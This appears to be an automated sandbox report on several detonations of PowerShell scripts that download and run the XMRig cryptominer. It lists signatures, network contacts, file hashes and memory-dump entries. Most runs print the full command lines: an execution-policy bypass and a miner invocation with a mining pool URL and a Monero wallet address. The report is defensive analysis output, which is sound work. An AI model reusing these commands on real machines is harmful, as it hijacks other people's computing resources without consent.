memory/2372-91-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-92-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-93-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-94-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-95-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-96-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-97-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-98-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-99-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-100-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-101-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-102-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-103-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-104-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-105-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-106-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-107-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-108-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-109-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-110-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-111-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-112-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-113-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-114-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-115-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-116-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-117-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
memory/2372-118-0x00007FF744590000-0x00007FF7451C3000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:43
Platform
win11-20240426-en
Max time kernel
1792s
Max time network
1752s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1280 wrote to memory of 2396 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1280 wrote to memory of 2396 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/1280-0-0x00007FF83A093000-0x00007FF83A095000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n5z3fhw4.51b.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1280-9-0x000002D3FCB50000-0x000002D3FCB72000-memory.dmp
memory/1280-10-0x00007FF83A090000-0x00007FF83AB52000-memory.dmp
memory/1280-11-0x00007FF83A090000-0x00007FF83AB52000-memory.dmp
memory/1280-12-0x00007FF83A090000-0x00007FF83AB52000-memory.dmp
memory/1280-14-0x000002D3FD050000-0x000002D3FD062000-memory.dmp
memory/1280-15-0x000002D3FD030000-0x000002D3FD03A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2396-46-0x00000189D2DA0000-0x00000189D2DC0000-memory.dmp
memory/2396-47-0x00000189D2DE0000-0x00000189D2E00000-memory.dmp
memory/2396-48-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/1280-49-0x00007FF83A090000-0x00007FF83AB52000-memory.dmp
memory/1280-50-0x00007FF83A093000-0x00007FF83A095000-memory.dmp
memory/2396-51-0x00000189D2E00000-0x00000189D2E20000-memory.dmp
memory/1280-52-0x00007FF83A090000-0x00007FF83AB52000-memory.dmp
memory/2396-53-0x00000189D2E20000-0x00000189D2E40000-memory.dmp
memory/2396-54-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-55-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-57-0x00000189D2E00000-0x00000189D2E20000-memory.dmp
memory/2396-56-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-58-0x00000189D2E20000-0x00000189D2E40000-memory.dmp
memory/2396-59-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-60-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-61-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-62-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-63-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-64-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-65-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-66-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-67-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-68-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-69-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-70-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-71-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-72-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-73-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-74-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-75-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-76-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-77-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-78-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-79-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-80-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-81-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-82-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-83-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-84-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-85-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-86-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-87-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-88-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-89-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-90-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-91-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-92-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-93-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-94-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-95-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-96-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-97-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-98-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-99-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-100-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-101-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-102-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-103-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-104-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-105-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-106-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-107-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-108-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-109-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-110-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-111-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-112-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-113-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-114-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-115-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-116-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
memory/2396-117-0x00007FF6334A0000-0x00007FF6340D3000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:06
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1745s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5036 wrote to memory of 1648 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5036 wrote to memory of 1648 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.193.132.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
Files
memory/5036-4-0x00007FFDC0CF3000-0x00007FFDC0CF4000-memory.dmp
memory/5036-5-0x000001F4791D0000-0x000001F4791F2000-memory.dmp
memory/5036-8-0x00007FFDC0CF0000-0x00007FFDC16DC000-memory.dmp
memory/5036-10-0x00007FFDC0CF0000-0x00007FFDC16DC000-memory.dmp
memory/5036-9-0x000001F479280000-0x000001F4792F6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfkhxv4l.qnq.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/5036-25-0x00007FFDC0CF0000-0x00007FFDC16DC000-memory.dmp
memory/5036-48-0x000001F479410000-0x000001F479422000-memory.dmp
memory/5036-61-0x000001F479270000-0x000001F47927A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1648-90-0x000001FEAFAA0000-0x000001FEAFAC0000-memory.dmp
memory/1648-91-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-92-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/5036-93-0x00007FFDC0CF3000-0x00007FFDC0CF4000-memory.dmp
memory/5036-94-0x00007FFDC0CF0000-0x00007FFDC16DC000-memory.dmp
memory/5036-95-0x00007FFDC0CF0000-0x00007FFDC16DC000-memory.dmp
memory/1648-96-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-97-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-98-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-99-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-100-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-101-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-102-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-103-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-104-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-105-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-106-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-107-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-108-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-109-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-110-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-111-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-112-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-113-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-114-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
memory/1648-115-0x00007FF729A70000-0x00007FF72A6A3000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:19
Platform
win11-20240508-en
Max time kernel
1788s
Max time network
1747s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4076 wrote to memory of 2704 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4076 wrote to memory of 2704 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qrl4a3xb.nov.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:21
Platform
win7-20240508-en
Max time kernel
1563s
Max time network
1564s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
Network
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:24
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1328 wrote to memory of 3944 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1328 wrote to memory of 3944 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4036,i,10373433614523925616,13586256558317053467,262144 --variations-seed-version --mojo-platform-channel-handle=4004 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1392,i,10373433614523925616,13586256558317053467,262144 --variations-seed-version --mojo-platform-channel-handle=1044 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i3gnk2nf.l5h.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
